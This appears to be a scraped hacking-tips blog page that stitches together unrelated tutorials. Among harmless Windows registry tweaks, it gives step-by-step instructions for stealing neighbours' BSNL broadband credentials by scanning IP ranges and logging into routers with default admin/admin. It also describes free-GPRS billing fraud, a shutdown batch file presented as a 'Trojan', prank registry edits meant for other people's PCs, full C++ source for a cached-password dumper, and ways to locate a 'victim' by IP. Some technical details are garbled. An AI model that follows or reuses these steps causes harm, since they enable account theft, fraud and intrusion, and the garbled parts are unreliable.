how to change windows7 logon screen

When you start your windows system, it stops at logon window for password. You can customize this logon screen background with any image of your choice. you can add your image to the logon background. You can do it with a small tweak. You need to choose a image for background then a registry editing. Follow these simple steps for logon screen background change.

1.Choose a image which you want to set as the background. It should be a .jpg file and it’s size should not exceed 245KB.

2. The image resolution can be anything of your choice. However I prefer 1440 x 900 or 1024 x 768. You can use any of the photo editing software such as Photoshop to compress and set the resolution for your image. Once you’re done, save this image as backgroundDefault.jpg.


3. Copy this image to the location


C:\Windows\system32\oobe\info\backgrounds
You will need to create that path if it does not already exist on your computer.


4. Now open the Registry Editor (Start --> Run --> Type regedit) and navigate to the following key


HKLM\Software\Microsoft\Windows\CurrentVersion\Authentication\LogonUI\Background


If Background does not exist rightclick LogonUI, select New and then Key, and then name it Background. Now locate OEMBackground (listed on the right side). If it does not exist, right-click Background and select New and then DWORD and name it OEMBackground.


5. Double-click on OEMBackground and set the Value Data to 1.


6. Now log-off to see the new logon screen background. If you would like to revert back to the default background, just set the Value Data back to 0.

free gprs tricks....

1.Download the moded Opera mini5  

2.Create a new setting in your mobile

Access Point= airtelgprs.com

Proxy address= nokiaovi-cust.opera-mini.net or 80.239.242.253

Port= 80 (Remember its 80 not 8080)

Thats it……..

You may get charged 0.30 paise during initialisation.

After that you are not charged.

Working 100%.Downloading is also free.

I tested downloading a small file of 1 MB and no deduction.

Enjoy Free Browsing and downloading.

It is Working at any balance.

Try and comment.

 

 

I encountered with this article in my tutorials database while going through it and after reading this article found the easy hack for BSNL, with this article you are able to hack BSNL Broadband of someone say your neighbour's BSNL Brooadband Account (actually the person whose IP is known to be vulnerable). Here, once you are able to obtain the password of victim, you can easily use his BSNL connection and thus hack his BSNL broadband connection account.

I have added an article to Speed up BSNL Dataone Broadband Surfing at my post Speed up Ur Internet 
Bsnl DataOne Broadband continues to grow as one the most popular broadband services in India with high speed facilities of upto 2 mpbs. But a large number of users of this service are vulnerable to hacker attacks because discovering and hacking the vulnerable victims of this network is shockingly simple. If you are a Bsnl Broadband user then immediately assess the security of your internet connection and take appropriate steps to secure yourself.

First lets see how simple it is to hack bsnl dataone broadband usernames and passwords. For this you shall need a ipscanner tool called Angry IP Scanner http://www.angryziber.com/ipscan/ or anything similar.

Ok so lets begin... Get your IP from :
www.ipmango.com


Step 1 : Start Angry IP scanner and goto options > ports. Type in 80 in the first ports textbox and click ok.
Then goto options > options ; in the display section select "only open ports" and click ok&save.

Now on the main screen put in the ip scan range as something 59.*.0.0 - 59.*.255.255 (for e.g. 59.95.2.3) and click the start button. And the list that shall follow next are the victims. In this example we choose the range 59.95.0.0 - 59.95.255.255. You will be surprised at the number of victims you discover.

Step 2 : Pick the ip-address of any of them and open up your browser and type in
http://59.*.*.* (the * should be replaced by the values from the ip you are using. A box will popup asking for username and password. Enter the username : admin and password : admin .There is a high chance that you will be able to login with that username and password.
admin-admin is the default username and password that is set while manufacturing the adsl modem devices.

What follows next is the modem administration panel.
Simply search for the "WAN" option and click it. On the next page you will find the username and password of that user. now right-click on the page and click view source. in Mozilla/Opera This frame -> view frame source

Now in the source code search for this : INPUT TYPE="PASSWORD"

and the value field of this input element will have the password

if its not there as in case of D-Link DSL 502T ADSL Routers the search for this

input type="hidden" name="connection0:pppoe:settings/password" value="password" id="uiPostPppoePassword"

and the value field will have the password
Well each steps take less than 1 minute so getting username passwords wont take even 2 minutes and is easier than sending a mail.

And this exposes the weak security of bsnl broadband users.

Well this is not a weakness but more of a mis-configuration which leads to insecurity. If you understand networking then you would probably realise that it was merely logging into the remote administration service of the modem and nothing else. This was not really hacking but a simple search of victims who are absolutely ignorant of their weaksecurity on the internet.

Most routers have an option where remote management can be disabled. In other words, you can only connect to the configuration interface from the internal network, not the WAN(Internet) side. You would definitely want to make sure remote management is not active to protect yourself.

Note : On SmartAX MT880 eventhough Remote Management is disabled , it permits remote logins from over the Internet. So change your mode administration passwords immediately.

The problem is that the professionals at Bsnl are ignorant of such simplicity of networking and unable to advise the users or guide them to take proper security measures leaving their customers and themselves absolutely unsecure.

Now lets check a few more options related to this issue. A bsnl broadband modem can be used in two modes. RFC Bridged mode and pppoe mode.

In the RFC Bridged mode the device behaves like a modem device that is attached to your computer and you use some dialup software to dial into the isp through this modem.This is PPPOE from the PC and the adsl device is a good modem. This mode is safer as the username password are on your pc and nothing is on the modem.

In the PPPOE mode the adsl device becomes a router - a distinct network device with many features enabled. In this mode the username password is stored in the modem which will dial to the isp and establish the internet connectivity. The computers will just connect to this router who would be their primary gateway. Now this is the mode where the risk exists.

If remote administration is enabled the remote users from the internet can login to this modems administration panel. Now the main problem is the default admin username-password which most users dont change due to ignorance. "admin-admin" is pair that works in most cases giving you full access to the modems internals. What follows next is simple as drinking a glass of orange juice.

Many users install firewalls and think they are safe, but they fail to understand that the firewall protects their PC not the "router" since the topology is like

(PC) -> router -> internet

So how should you secure yourself ?

1. Use RFC Bridged mode if it is sufficient for you.

2. Change the default admin password of your modem.

3. Disable wan ping reply . ( this will prevent the hackers from directly discovering your pc when it is on the internet)

4. Disable remote configuration feature.

5. Check your broadband usage on a regular basis and compare it with your own surfing schedules to check whether someone else has used it or not. If suspiscious usage is indicated then immediately change your broadband password as well. Or a better suggestion would be to change broadband passwords on a regular basis.

Try to spread the security awareness to your friends and other relatives who are using Bsnl broadband and encourage them to secure their internet connectivity.

 

TATA DOCOMO provides the best GSM mobile service, cheapest prepaid tariffs with 1 second pulse rate.If you are a Tata Docomo user , then you have something to cheer about. They have launched two Unlimited GPRS plans for prepaid users , and you dont have to pay a single penny once you activae this GPRS Hack. 

To access free internet on Tata docomo mobile service , you have to download opera mini mobile browser and configure it as follows.
Steps for Free GPRS on TATA Docomo :

1. In the operators menu goto custom1
2. in the Proxy option check “http”
3. In Proxy Server , type internet.tatadocomo.com and leave everything else as it is
4. Now initialize using Default APN-tata.docomo.dive.in
5. To access Free GPRS keep your account balance below 30 paise
6. Now download unlimited songs and pictures on your mobile.

gmail hacking ebook free download

complete gmail hacking guide.

http://www.ziddu.com/download/15192158/HackingGmailstealthhackroom.blogspot.com.pdf.html

How to Recover Deleted SMS from SIM or Phone

Have you deleted SMS messages that you wish had not gotten deleted? You will be happy to know there are a number of different software that can help you recover the messages you need and want, but not all of them are free and you need to purchase the software. However, if you own a Nokia phone you might be in luck, as there are very good chances of message recovery from your cellphone without need of any specialized data recovery software for free. In this tutorial I will explain, what are the steps to be followed in order to recover deleted SMS from a SIM card or phone memory.



STEPS INVOLVED:
1. First of all download and install FExplorer, excellent file manager and also sends files via Bluetooth.


2. Launch FExplorer and navigate to C: if you use Phone Memory to store your messages (default) and D: if you use Storage Card as your SMS storage location.

3. Now navigate to and open "system" folder.

4. Now open the "mail" folder.

5. This folder should contain many folders named similar to 0010001_s etc. with files named similar to 00100000 etc. These files are the actual deleted messages. Simply, use the FExplorer inbuild text viewer to view these files. You will need to browse through every folder and open all files inside them until you get the required SMS.

This tool includes more great fetures like:

• Cut, copy & paste files
• Check date modified & size
• Display free space available
• View file with inbuilt text viewer
• Cut, copy, create & paste directories
• File find. (although this only works within a directory)
• Take screenshots
• Set your backlight to be permanently on
• Send files via bluetooth. (may be necessary to rename .sis to .sis_)
• Compress memory - increasing available free memory ...and much more.

All of all FExplorer is a handy file explorer application for your Series 60 phone. With a wide range of features, tips and tricks, FExplorer will become one of your favorite mobile applications

CREATE TROJAN VIRUS

Trojan virus is just a file but when you open it. It starts a countdown to turn off your computer and you cant exit it this will do no damage just shut down your computer

1. First open notepad and type the following :



@echo off

A:
cls

shutdown –s –t 20 –c “what you want to say”

2. The number (20) is how long the countdown is before it shut down

3. You can change colour by putting

color A

instead of

A:

Cls

and you can also fill the box with letters by putting

pause

l:

dir/s

goto 1

4. Save this file as name.bat

Switches you can used with shutdown

-s for shutting down the pc

-t nn Indicates the duration of delay, in seconds, before

-c "messagetext" Displays a message in the System Shutdown window.
maximum of 127 characters can be used. The

message must be enclosed in quotation marks

Other useful commands

-f Forces any running applications to shut down.

-r Reboots the PC

-l Logs off the current user

watch out my new website on computers.

THIS WEBSITE IS A PART OF MINI PROJECT MADE BY ME.


www.apoorvsitapur.webs.com

Untold Windows Tips and Secrets By Apoorv

Welcome to another Hacking Truths Manual. This time I have a collection of Tips and Tricks which no body normally knows, the secrets which Microsoft is afraid to tell the people, the information which you will seldom find all gathered up and arranged in a single file. To fully reap this Manual you need to have a basic understanding of the Windows Registry, as almost all the Tricks and Tips involve this file.

****************

Important Note: Before you read on, you need to keep one thing in mind. Whenever you make changes to the Windows Registry you need to Refresh it before the changes take place. Simply press F5 to refresh the registry and enable the changes. If this does not work Restart your system

****************

Exiting Windows the Cool and Quick Way

Normally it takes a hell lot of time just Shutting down Windows, you have to move your mouse to the Start Button, click on it, move it again over Shut Down, click, then move it over the necessary option and click, then move the cursor over the OK button and once again (you guessed it) click.This whole process can be shortened by creating shortcuts on the Desktop which will shut down Windows at the click of a button. Start by creating a new shortcut( right click and select New> Shortcut). Then in the command line box, type (without the quotes.)

'C:\windows\rundll.exe user.exe,exitwindowsexec'

This Shortcut on clicking will restart Windows immediately without any Warning. To create a Shortcut to Restarting Windows, type the following in the Command Line box:

'c:\windows\rundll.exe user.exe,exitwindows'

This Shortcut on clicking will shut down Windows immediately without any Warning.

Ban Shutdowns : A trick to Play on Lamers

This is a neat trick you can play on that lamer that has a huge ego, in this section I teach you, how to disable the Shut Down option in the Shut Down Dialog Box. This trick involves editing the registry, so please make backups. Launch regedit.exe and go to

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

In the right pane look for the NoClose Key. If it is not already there then create it by right clicking in the right pane and selecting New > String Value.(Name it NoCloseKey ) Now once you see the NoCloseKey in the right pane, right click on it and select Modify. Then Type 1 in the Value Data Box.

Doing the above on a Win98 system disables the Shut Down option in the Shut Down Dialog Box. But on a Win95 machine if the value of NoCloseKey is set to 1 then click on the Start > Shut Down button displays the following error message:

This operation has been cancelled due to restrictions in effect on this computer. Please contact your system administrator.

You can enable the shut down option by changing the value of NoCloseKey to 0 or simply deleting the particular entry i.e. deleting NoCloseKey.

Instead of performing the above difficult to remember process, simply save the following with an extension of .reg and add it's contents to the registry by double clicking on it.

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

"NoClose"="1"

Disabling Display of Drives in My Computer

This is yet another trick you can play on your geek friend. To disable the display of local or networked drives when you click My Computer go to :

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Now in the right pane create a new DWORD item and name it NoDrives. Now modify it's value and set it to 3FFFFFF (Hexadecimal) Now press F5 to refresh. When you click on My Computer, no drives will be shown. To enable display of drives in My Computer, simply delete this DWORD item. It's .reg file is as follows:

REGEDIT4

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]

"NoDrives"=dword:03ffffff

Take Over the Screen Saver

*(Not Check) To activate and deactivate the screen saver whenever you want, goto the following registry key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\ScreenSavers

Now add a new string value and name it Mouse Corners. Edit this new value to -Y-N. Press F5 to refresh the registry. Voila! Now you can activate your screensaver by simply placing the mouse cursor at the top right corner of the screen and if you take the mouse to the bottom left corner of the screen, the screensaver will deactivate.

Pop a banner each time Windows Boots

To pop a banner which can contain any message you want to display just before a user is going to log on, go to the key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WinLogon

Now create a new string Value in the right pane named LegalNoticeCaption and enter the value that you want to see in the Menu Bar. Now create yet another new string value and name it: LegalNoticeText. Modify it and insert the message you want to display each time Windows boots. This can be effectively used to display the company's private policy each time the user logs on to his NT box. It's .reg file would be:

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Winlogon]

"LegalNoticeCaption"="Caption here."

Delete the Tips of the Day to save 5KB

Windows 95 had these tips of the day which appeared on a system running a newly installed Windows OS. These tips of the day are stored in the Windows Registry and consume 5K of space. For those of you who are really concerned about how much free space your hard disk has, I have the perfect trick.

To save 5K go to the following key in Regedit:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Tips

Now simply delete these tricks by selecting and pressing the DEL key.

Change the Default Locations

To change the default drive or path where Windows will look for it's installation files, go to the key:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Setup\SourcePath

Now you can edit as you wish.

Secure your Desktop Icons and Settings

You can save your desktop settings and secure it from your nerdy friend by playing with the registry. Simply launch the Registry Editor go to:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

In the right pane create a new DWORD Value named NoSaveSettings and modify it's value to 1. Refresh and restart for the settings to get saved.

CLSID Folders Explained

Don't you just hate those stubborn stupid icons that refuse to leave the desktop, like the Network Neighborhood icon. I am sure you want to know how you can delete them. You may say, that is really simple, simply right click on the concerned icon and select Delete. Well not exactly, you see when you right click on these special folders( see entire list below)neither the rename nor the delete option does not appear. To delete these folders, there are two methods, the first one is using the System Policy Editor(Poledit in the Windows installation CD)and the second is using the Registry.

  

Windows Password Files Torn Apart

All Windows, users would probably be familiar with the infamous ‘pwl’ files or the files where the Windows login passwords are stored. Well, this manual is aimed at, simplifying how the authentication works when you type in your User name And password, what exactly .pwl files contain, where exactly they come into the picture and a whole lot of related things.

The *.pwl files are basically files in which the Windows Login Passwords are stored in. These files can be found in the \Windows directory by the name of the User, whose password it contains. For Example, if your Windows login Username is ankit, then the corresponding password would be stored in c:\windows\ankit.pwl Get it? These .pwl files are readable in any text editor like Notepad, but they are definitely not understandable.  A typical example, of the contents of a  .pwl file is as follows:

ã‚...-                                                                                                                                                                                                                                                                     

ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ

ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿ

ÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿÿR  

                                                                     

p u.ÐX+|rÐq"±/2³ Êå¡hCJ‚D  ×  `ÍY¥!íx}(qW¤ãƱ<!?àÜ6šá˜ôæ4+\3/4õ+%E°ËÔýmÇÔ ÞI»‚ B àלøÐ...'@

This is definitely not something; a normal person can comprehend or make sense of.

Now, besides the Windows registry, Microsoft’s policy of security by obscurity can also be seen in the case of what .pwl files. Although the original usage of .pwl files was a standard to be used, by all applications, Microsoft simply does not officially provide any type of information on the standards of .pwl files.

To get a list of .pwl files in your system or in other words to find out which all passwords using the .pwl technology (What a good friend of mine likes to call them) are being stored on a particular system, then simply open c:\windows\system.ini in a plaintext editor like Notepad and look under the [Password Lists] section. A typical line from this section would be in the following format: USERNAME=Path_of_pwl_file

For Example,

[Password Lists]

ankit=c:\windows\ankit.pwl

This tells us that the .pwl containing the password for the Username ‘ankit’ is stored at: c:\windows\ankit.pwl

Anyway, the algorithm which is used in the case of storing information in the .pwl files (rather in the .pwl security option), refers to such files as databases, with each record consisting of three fields-:

Resource name

Resource password

Resource type (0..255)

Before, I move onto giving details about the above three fields, let us discuss, how exactly the User Authentication process takes place in Windows (In the case of the login password.)

NOTE: The below process is what happens in the case of the Windows login password.

When you first set a new account on Windows, it derives an encryption key from the specified password and creates c:\windows\username.pwl file, where username is the, well, quite obvious. One, thing to note here is that the .pwl file does not, I repeat does not store the login password, nor does it store the Username.(Although its name is same as the Username for whose authentication it is used.) What it stores, will become clearer once you read the below paragraph.

Now, the next time, you boot your system and type in your Username and password, then Windows,

decrypts the .pwl corresponding to the Username provided, using the decrypting key obtained from the password provided. Once, the .pwl file has been decrypted using the decryption key obtained from the provided password, Windows, verifies the checksum. If the checksum is correct or matches, then the user is authenticated else, try again. In the process of checksum verification, the username provided plays an important role.

Both the Username and Checksum are encrypted using a simple algorithm: RC4.

*****************************

HACKING TRUTH: Although, almost always, the name of the .pwl file is same as the Username, sometimes the name does differ. For Example, if, I use 2 to 3 different applications using .pwl security and then use the same username i.e. ankit in all of them to store passwords, then the naming of the .pwl files would be as follows:

The first .pwl would be named: ankit.pwl, the second would be named: ankit000.pwl , the third would be: ankit001.pwl and so on.

And, I am not too sure, but from what I gather, Windows never ever overwrites a .pwl file.

******************************

Coming, back to the fields. Both the resource name and resource password fields can be binary or simply encrypted and they are interchangeable by the application involved. The Resource Type field can have different numerical values depending upon the software involved. For Example, DUN, Dial Up Server and Windows Login, uses 6 as the value for the Resource Type field. While, Internet Explorer uses 19 as the value of the same field.

 

One thing to note about Windows Login password algorithms is that, the first time it was introduced, the algorithm was very very weak and allowed passwords to be easily decrypted. However, with each new release, the algorithms used have been improving. However, it still has not reached a reliable level.

In the algorithms used by various Operating Systems to encrypt their login passwords, the algorithm used by Windows is the worst.  Some common defects are-:

The cipher algorithms involved are relatively lame. i.e. RC4 and MD5. They can easily be broken. Refer to: http://hackingtruths.box.sk\algorithms.htm for more info on various Encryption algorithms.

All passwords are converted to uppercase

Un-acceptably lame or weak method of storage.

Various Holes existing in the Password Caching Facility. The following Visual C++ program demonstrates further as to how this vulnerability can be exploited.

/*

(c) 1997, 98 Vitas Ramanchauskas

Use Visual C++ to compile this into win32 console app.

This code provided for educational purpose only.

!! NO WARRANTY, NO SUPPORT !!

*/

#include <windows.h>

#include <stdio.h>

typedef struct tagPASSWORD_CACHE_ENTRY {

WORD cbEntry; // size of this entry, in bytes

WORD cbResource; // size of resource name, in bytes

WORD cbPassword; // size of password, in bytes

BYTE iEntry; // entry index

BYTE nType; // type of entry

BYTE abResource[1]; // start of resource name

// password immediately follows resource name

} PASSWORD_CACHE_ENTRY;

char *buf, *ob1;

int cnt = 0;

BOOL CALLBACK pce(PASSWORD_CACHE_ENTRY *x, DWORD)

{

cnt++;

memmove(buf, x->abResource, x->cbResource);

buf[x->cbResource] = 0;

CharToOem(buf, ob1);    // for non-English users

printf("%-30s : ", ob1);

memmove(buf, x->abResource+x->cbResource, x->cbPassword);

buf[x->cbPassword] = 0;

CharToOem(buf, ob1);

printf("%s\n", ob1);

return TRUE;

}

void main()

{

buf = new char[1024];

ob1 = new char[1024];

puts("There is no security in this crazy world!\n"

"Win95 PWL viewer v1.01 (c) 1997, 98 Vitas Ramanchauskas\n"

"************\n"

"!DISCLAIMER!\n"

"!This program intended to be used for legal purpose only!\n"

"************\n\n"

"This program shows cached passwords using standard (but undocumented)\n"

"Windows API on local machine for current user (user must be logged in).\n"

"You may invoke pwlview in this way: pwlview >> textfile.txt\n"

"to save passwords in file (don't forget to press enter twice)\n"

"Press Enter to begin...\n");

getchar();

HINSTANCE hi = LoadLibrary("mpr.dll");

if(!hi)

{

puts("Couldn't load mpr.dll. This program is for Windows 95 only");

return;

}

WORD (__stdcall *enp)(LPSTR, WORD, BYTE, void*, DWORD) =

(WORD (__stdcall *)(LPSTR, WORD, BYTE, void*, DWORD))GetProcAddress(hi, "WNetEnumCachedPasswords");

if(!enp)

{

puts("Couldn't import function. This program is for Windows 95 only");

return;

}

(*enp)(0,0, 0xff, pce, 0);

if(!cnt)

puts("No passwords found.\n"

"Probably password caching was not used or user is not logged in.");

FreeLibrary(hi);

puts("\nPress Enter to quit");

getchar();

}

Getting geographical Information using an IP Address

Getting the Internet Protocol or the IP Address of a remote system is said to the most important step in hacking of a system. Sometimes, however we get an IP in order to get more information on someone or some host. But, how can an IP Address be used to get more information on the location etc of a system? Well, this manual is aimed at answering just this question.

                                                            

Actually, the IP address (Actually the entire TCP/IP Protocol) is structured or designed such that one cannot tell as to in which country a system having the given IP is situated, by simply looking at it. An IP Address has no fields, which tell you the country in which the computer using it resides in. So, all myths like ‘The Second or the third field of an IP stands for the country in which the system using it resides’ are definitely false and untrue.

However, yes sometimes one can guess or deduce as to in which country and even in which city the system using an IP resides in, by simply looking at the first three fields of the IP. Let us take an example to understand what I mean to say by this. Now, before I move on the example, let us understand how exactly IP Addresses are awarded to you.

Firstly, your ISP registers at the central authority and gets a particular range of IP addresses between which the various customers (people who dial into their servers) can be awarded IP addresses. Most ISP’s are given a Class C network Address. A class C Network address contains a 24-bit Network Prefix (the first three fields) and an 8-bit Host number (the last field). It is referred to as "24's" and is commonly used by most ISP's.

******************

HACKING TRUTH: For the benefit of beginners, I have included below a snippet from one of my earlier manuals, which explains IP Addresses better: (Even if you are not a newbie, I do suggest you read the below snippet, as it might just be helpful.)

Like in the real world, everyone has got an individual Home Address or telephone number so that, that particular individual can be contacted on that number or address, similarly all computers connected to the

Internet are given a unique Internet Protocol or IP address which can be used to contact that particular computer. In geek language an IP address would be a decimal notation that divides the 32- bit Internet addresses (IP) into four 8-bit fields.

Does the IP address give me some information or do the numbers stand for anything?

Let take the example of the following IP address: 202.144.49.110 Now the first part, the numbers before the first decimal i.e. 209 is the Network number or the Network Prefix.. This means that it identifies the number of the network in which the host is. The second part i.e. 144 is the Host Number that is it identifies the number of the host within the Network. This means that in the same Network, the network number is same. In order to provide flexibility in the size of the Network, here are different classes of IP addresses:

Address Class               Dotted Decimal Notation Ranges

Class A ( /8 Prefixes)         1.xxx.xxx.xxx through 126.xxx.xxx.xxx

Class B ( /16 Prefixes)        128.0.xxx.xxx through 191.255.xxx.xxx

Class C ( /24 Prefixes)        192.0.0.xxx through 223.255.255.xxx

The various classes will be clearer after reading the next few lines.

Each Class A Network Address contains a 8 bit Network Prefix followed by a 24-bit host number. They are considered to be primitive. They are referred to as "/8''s" or just "8's" as they have an 8-bit Network prefix.

In a Class B Network Address there is a 16 bit Network Prefix followed by a 16-bit Host number. It is referred to as "16's".

A class C Network address contains a 24-bit Network Prefix and a 8 bit Host number. It is referred to as

"24's" and is commonly used by most ISP's.

Due to the growing size of the Internet the Network Administrators faced many problems. The Internet routing tables were beginning to grow and now the administrators had to request another network number from the Internet before a new network could be installed at their site. This is where sub-netting came in.

Now if your ISP is a big one and if it provides you with dynamic IP addresses then you will most probably see that whenever you log on to the net, your IP address will have the same first 24 bits and only the last 8 bits will keep changing. This is due to the fact that when sub-netting comes in then the IP Addresses structure becomes:

xxx.xxx.zzz.yyy

where the first 2 parts are Network Prefix numbers and the zzz is the Subnet number and the yyy is the host number. So you are always connected to the same Subnet within the same Network. As a result the first 3 parts will remain the same and only the last part i.e. yyy is variable.

***********************

 For Example, if say an ISP xyz is given the IP: 203.98.12.xx Network address then you can be awarded any IP, whose first three fields are 203.98.12. Get it?

So, basically this means that each ISP has a particular range in which to allocate all its subscribers. Or in other words, all subscribers or all people connected to the internet using the same ISP, will have to be in this range. This in effect would mean that all people using the same ISP are likely to have the same first three fields of their IP Addresses.

This means that if you have done a lot of (By this I really mean a lot) of research, then you could figure out which ISP a person is using by simply looking at his IP. The ISP name could then be used to figure out the city and the country of the person. Right? Let me take an example to stress as to how cumbersome but easy (once the research is done) the above method can be.

In my country, say there are three main ISP’s:

ISP Name                               Network Address Allotted

ISP I                                        203.94.47.xx

ISP II                                      202.92.12.xx

ISP III                                     203.91.35.xx

Now, if I get to know the IP of an e-pal of mine, and it reads: 203.91.35.12, then I can pretty easily figure out that he uses ISP III to connect to the internet. Right? You might say that any idiot would be able to do this. Well, yes and no. You see, the above method of finding out the ISP of a person was successful only because we already had the ISP and Network Address Allotted list with us. So, what my point is, that the above method can be successful only after a lot of research and experimentation. And, I do think such research can be helpful sometimes.

Also, this would not work, if you take it all on in larger scale. What if the IP that you have belongs to someone living in a remote igloo in the North Pole? You could not possibly get the Network Addresses of all the ISP’s in the world, could you?

NOTE: In the above case, you also get to know the city of the system using the given IP, as most ISP’s use different network addresses in different cities. Also, some ISP’s are operational in a single city.

So, is there a better method of getting the location of an IP? Yes, Reverse DNS lookups hold the key.

Just as DNS lookup converts the hostname into IP address, a Reverse DNS Lookup converts the IP address of a host to the hostname.  By hostname, what I mean to say is that it given us the name of the remote system in alphabets and numbers and periods.  For Example, mail2.bol.net.in would be a hostname, while 203.45.67.98 would not be a hostname.

The popular and wonderful Unix utility ‘nslookup’ can be used for performing Reverse DNS lookups.

So, if you using a *nix box or if you have access to a shell account, then the first this to do is to locate where the nslookup command is hidden by issuing the following command:

 ' whereis nslookup '.

Once you locate where the utility is hidden, you could easily use it to perform both normal and reverse DNS lookups. As this is not a manual on using the ‘nslookup’ command, I will simply giving a basic relevant outline. In order to get a more detailed description of how this works or how to use it, read the *nix man pages or the documentation.

We can use ‘nslookup’ to perform a reverse DNS lookup by mentioning the IP of the host at the prompt.

For Example,

$>nslookup IP Address

Note: The below IP’s and corresponding hostnames have been made up. They may not actually exist.

Let us say, that above, instead of IP Address, we type 203.94.12.01 (which would be the IP I want to trace.).

$>nslookup  203.94.12.01

Then, you would receive a response similar to: mail2.bol.net.in

Now, if you carefully look at the hostname that the Reverse DNS lookup, gave us, then the last part reveals the country in which system resides in. You see, the ‘.in’ part signifies that the system is located in India. All countries have been allotted country codes, which more often than not are the last part of the hostnames of the systems located in that country. This method can also be used to figure out as to which country a person lives in, if you know his email address. For Example, if a person has an email address ending in .ph then he probably lives in Philippines and if it ends in .il then he lives in Israel and so on. Some common country codes are:

Country                                 Code

Australia                .au

Indonesia                .id

India                       .in

Japan                      .jp

Israel                      .il

Britain                    .uk

For a complete list of country codes, visit:

http://www.alldomains.com

http://www.iana.org/domain-names.html

*****************

General Extra Tip: To get the complete list of US State Abbreviation codes, visit:

http://www.usps.gov/ncsc/lookups/abbr_state.txt

****************

Windows users can perform Reverse DNS queries by downloading an utility called Samspade from: www.samspade.com

Another method of getting the exact geographical location of a system on the globe is by making use of the WHOIS database. The WHOIS database is basically the main database, which contains a variety of information like contact details, name etc on the person who owns a particular domain name. So, basically what one does in a WHOIS query, is supply the WHOIS service with the hostname on which he wants more information.  The WHOIS service then replies with the information stored in its database.

This method can be used to get some pretty accurate information on a particular IP or hostname; however, it is probably of no use if you are trying to point out the exact location of a dynamic IP. But, again this can be used to get atleast the city in which the ISP used by the victim is situated.

You can carry out WHOIS queries at: http://www.allwhois.com

You could also directly enter the following in the location bar of your Browser and perform a WHOIS enquiry.

Enter the following in the location bar of your browser:

http://205.177.25.9/cgi-bin/whois?abc.com

Note: Replace abc.com with the domain name on which you want to perform a WHOIS query.

This method cannot be used to get the contact address of a person, if the IP that you use to trace him, belongs to his ISP. So, either you need to know the domain name (which is registered on his name) or have to remain satisfied knowing only the city (and ISP) used by the person.

Say, the victim has registered a domain name and you want to use it to find out the city in which he resides. Now, one thing to remember in this case is that, if the victim has registered the domain name using any of the various free .com registration services like Namezero.com etc, then the domain name would probably be registered on the company’s name and not the victim’s name. So, a WHOIS query will give information on the ISP and not the victim.

*****************

NEWBIE NOTE: The WHOIS service by default runs on Port 43 of a system. Try performing a WHOIS query by telnetting to Port 43 and manually typing out the query. I have never tried it, however, it might be fun.

***************

Yet another and probably the second most efficient method (after Reverse DNS queries) of tracing an IP to its exact geographical location, is to carry out a ‘traceroute’ on it. The ‘tracert’ or ‘traceroute’ commands give you the names or IP’s of the routers through which it passes, before reaching the destination. Windows users can perform a trace of an IP, by typing the following at the command line prompt:

C:\windows>tracert IP or Hostname

For more information about the usage and syntax of this command, type: ‘tracert’ at the command prompt.

Anyway, now let us see what is the result, when I do a tracert on my IP. Remember I live in New Delhi which is a city in India. Watch the names of the hostnames closely, as you will find that they reveal the cities through which the packet passes.

C:\windows>tracert 203.94.12.54

Tracing route to 203.94.12.54 over a maximum of 30 hops

  

1 abc.netzero.com (232.61.41.251) 2 ms 1 ms 1 ms 

2  xyz.Netzero.com (232.61.41.0) 5 ms 5 ms 5 ms 

3 232.61.41.10 (232.61.41.251)  9 ms 11 ms 13 ms 

4 we21.spectranet.com (196.01.83.12) 535 ms 549 ms 513 ms 

5 isp.net.ny (196.23.0.0) 562 ms 596 ms 600 ms 

6 196.23.0.25 (196.23.0.25)  1195 ms1204 ms 

7 backbone.isp.ny (198.87.12.11) 1208 ms1216 ms1233 ms

8  asianet.com (202.12.32.10)  1210 ms1239 ms1211 ms 

9  south.asinet.com (202.10.10.10) 1069 ms1087 ms1122 ms 

10 backbone.vsnl.net.in  (203.98.46.01) 1064 ms1109 ms1061 ms 

11 newdelhi-01.backbone.vsnl.net.in (203.102.46.01) 1185 ms1146 ms1203 ms 

12 newdelhi-00.backbone.vsnl.net.in (203.102.46.02) ms1159 ms1073 ms 

13 mtnl.net.in (203.194.56.00)  1052 ms 642 ms 658 ms 

So, the above shows us that the route taken by a data to reach the supplied IP is somewhat like this:

Netzero (ISP from which the data is sent) ---à Spectranet (A Backbone Provider) -----à New York ISP ---àNew York Backbone -à Asia --à South Asia -à India Backbone --à New Delhi Backbone --à Another router in New Delhi Backbone ---à New Delhi ISP.

So, basically this tracert does reveal my real location, which is: New Delhi, India, South Asia. Get it?

Sometimes, doing a ‘tracert’ on an IP, does not give useful information. You see in the above example, the hostnames returned revealed the city or country in which the system is located. Although, more often than not, you will get such helpful hostnames, sometimes the hostnames returned are very vague and unhelpful.

So what do you do then? Well, fret not. Simply do the below procedure.

